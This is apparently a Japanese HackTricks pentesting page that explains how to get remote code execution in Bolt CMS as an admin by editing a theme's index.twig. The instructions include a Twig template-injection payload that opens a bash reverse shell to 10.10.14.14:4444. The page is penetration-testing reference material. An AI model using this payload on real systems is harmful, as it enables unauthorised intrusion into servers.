Bolt CMS

ゼロからヒーローまでAWSハッキングを学ぶ htARTE（HackTricks AWS Red Team Expert）！

HackTricksをサポートする他の方法：

HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください！
公式PEASS＆HackTricksグッズを入手する
The PEASS Familyを発見し、独占的なNFTコレクションを見る
💬 Discordグループに参加するか、telegramグループに参加するか、Twitterでフォローする 🐦 @carlospolopm。
ハッキングトリックを共有するには、PRを HackTricks および HackTricks Cloud のGitHubリポジトリに提出してください。

RCE

管理者としてログインした後（ログインプロンプトにアクセスするには/botに移動します）、Bolt CMSでRCEを取得できます：

Configurationを選択 -> View Configuration -> Main ConfigurationまたはURLパス/bolt/file-edit/config?file=/bolt/config.yamlに移動
themeの値を確認します

File managementを選択 -> View & edit templates
前のステップで見つかったテーマベース（この場合はbase-2021）を選択し、index.twigを選択します
私の場合、URLパスは/bolt/file-edit/themes?file=/base-2021/index.twigにあります
テンプレートインジェクション（Twig）を介してこのファイルにペイロードを設定します。例：{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
そして変更を保存します

ゼロからヒーローまでAWSハッキングを学ぶ htARTE（HackTricks AWS Red Team Expert）！

HackTricksをサポートする他の方法：

HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください！
公式PEASS＆HackTricksグッズを入手する
The PEASS Familyを発見し、独占的なNFTコレクションを見る
💬 Discordグループに参加するか、telegramグループに参加するか、Twitterでフォローする 🐦 @carlospolopm。
ハッキングトリックを共有するには、PRを HackTricks および HackTricks Cloud のGitHubリポジトリに提出してください。

Last updated 3 days ago